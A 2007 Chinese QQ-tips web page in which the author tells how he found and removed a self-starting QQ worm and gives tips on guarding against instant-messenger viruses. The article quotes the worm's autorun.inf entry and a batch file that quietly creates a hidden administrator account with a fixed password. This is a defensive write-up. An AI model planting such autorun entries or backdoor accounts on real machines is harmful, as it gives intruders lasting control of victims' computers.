• 网站首页
  • 空间模块
  • flash模块
  • 空间代码
  • 空间大图
  • 空间教程
  • 空间装饰
  • 空间素材
  • 个性贴图
  • 非主流图片
  • 空间互踩
  • 空间论坛
  • 个性网名
  • 个性签名
  • .个性资料
  • 情感日记
  • QQ资讯
  • QQ技巧
  • QQ软件
  • QQ表情
  • QQ头像
  • .QQ皮肤
  • QQ游戏
  • 博客主页

...

最新推荐文章

  • QQ空间免费粉色皮肤代码与…
  • 圣诞节祝福话语
  • 破解加QQ要回答问题
  • QQ空间音乐绿钻免费使用方…
  • 点亮QQ书签图标方法
  • 点亮QQlive高级用户图标方…
  • 移动用户使用手机QQ的常见…
  • 移动用户使用手机QQ的常见…
  • QQ好友恢复系统,Q被盗后使…

热门推荐文章

  • QQ空间音乐绿钻免费使用方…
  • 病毒预报:QQ面临病毒“偷…
  • QQ虚拟摄像头 随意和MM视…
  • 给QQ上保险:我的QQ密码谁…
  • 小偷滚开!QQ密码最新巧防…
  • 和漂亮MM视频也能“秀”相…
  • 给QQ上保险:我的QQ谁也偷…
  • [一组生活照片]MM好秀气哦
  • 无敌暴强视频MM截图大合集…

..............

您现在的位置: 酷QQ站 >> QQ技巧教程 >> QQ使用技巧 >> 文章正文

您想找的文章是:

抓住QQ的“小尾巴”—另类自启动病毒攻防

作者:佚名    文章来源:不详    点击数:5262    更新时间:2007-9-5
   

笔者最近遇到一个采取另类方式启动的病毒――QQ乐(Worm/QQMsg.Lee),现把一波三折的查杀过程和一些经验写出来,供朋友们参考。

某日在QQ里连续收到一位朋友发来的消息,该消息中都带 
有一串网址,经证实并不是他主动发来的,于是怀疑他的电脑中了病毒。笔者首先打 开金山网镖防火墙,检查发现一个正在访问网络的可疑程序“System32.exe”,通过名字可以看出它是想与System32文件夹相混淆,于是点击 右上角的“结束进程”杀掉它。然后按图索骥到C盘根目录下找到并删除它,接着打开了注册表编辑器。因为一般木马和病毒都喜欢在这里添加自启动键值,但是检 查了所有以RUN为开头的项都没有与这个文件相关联的启动项,看来这个病毒十分狡猾。

接着在资源管理器中检查Win.ini和System.ini,因为有些病毒会在Win.ini中的[Windows]小节下的load和run字 段后面,以及System.ini中的[boot]小节的Shell=Explorer.exe后面添加启动项,以便每次开机时自动运行。谁知这些地方仍 然一无所获,不过却意外发现系统中多出了一个管理员账户“Lee”,怀疑是病毒添加的,于是删除它。

正在笔者为找不到毒源而纳闷时,进程中又重新出现了病毒文件“System32.exe”,而且被删除的账户也重新恢复。看来如果不找到病毒的启动 机制,就难以彻底制服它。于是笔者打开“搜索”,在“文件中的一个字或词组”(这里可以搜索文件内部的内容)一栏中输入“System32.exe”,经 过一番等待,在搜索结果中发现了数个“AutoRun.inf”文件,用记事本打开它,内容为:

  [autorun]

  open=System32.exe

原来病毒自启动的根源在这儿。感染病毒后它会在每个分区的根目录下创建Autorun.inf文件和病毒体System32.exe、 System32dll.dll,使得每次双击盘符打开时病毒都会自动运行(原理与自启动光盘相同),这种方法确实比在注册表中添加启动项更不容易被发 现。笔者接着又利用前面的搜索方法,查找“Lee”这个关键字,结果发现了一个自动创建管理员账户的批处理文件“Admin.bat”。用记事本打开它, 内容如下:

  net user lee abcd1234!@# /add

  net localgroup administrators lee /add

通过内容可以看出病毒是要增加一个名为lee,密码为abcd1234!@#的新账户,然后将它加入管理员组中(即赋予管理员权限)。毒根找到了,下面就可以大开“杀戒”了,把找到的这些文件统统删除。

IM病毒防范技巧:

1. 用QQ等即时通讯工具聊天时,除了开启病毒和网络防火墙以外,还要打开嵌入式防火墙,例如金山毒霸6中的“腾讯QQ、MSN Messenger、ICQ安全助手”。至少要把金山网镖等防火墙的安全级别设置到中以上,才能更有效拦截木马程序和网络攻击。

2. 不要随意点击QQ中的链接,因为许多病毒都会伪装成网页链接,并通过消息中具有欺骗和诱惑的文字让你去点击,例如QQ小尾巴。

【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】

【将抓住QQ的“小尾巴”—另类自启动病毒攻防文章发送给你的好友】

  • 上一篇文章: 利用Hosts文件防止QQ病毒
  • 下一篇文章: 让指定的QQ号码无法登录
  • 抓住QQ的“小尾巴”—另类自启动病毒攻防相关文章:

    [升级了]手机1条短信,换取20个Q币(原来2个)
    QQ文字图片生成器 打造个性QQ聊天内容
    无需发贴也可点亮Q吧
    如何让自己的Qzone空间打开快?
    在您的博客、网页中显示QQ书签收藏代码
       关于我们 | 友情链接 | 联系我们 | 免责声明 | 用户留言 | 网站导航 | 支持论坛  
        QQ空间 非主流图片 QQ空间代码 QQ空间模块 -└酷酷QQ空间代码站版权所有
    copyright © 2007-2008 www.kukuQQ.com all rights reserved. kukuQQ
    推荐使用最佳分辨率浏览 1024x768 to Firefox, MS-IE6 IE7. Site powered by Powerkukuqq.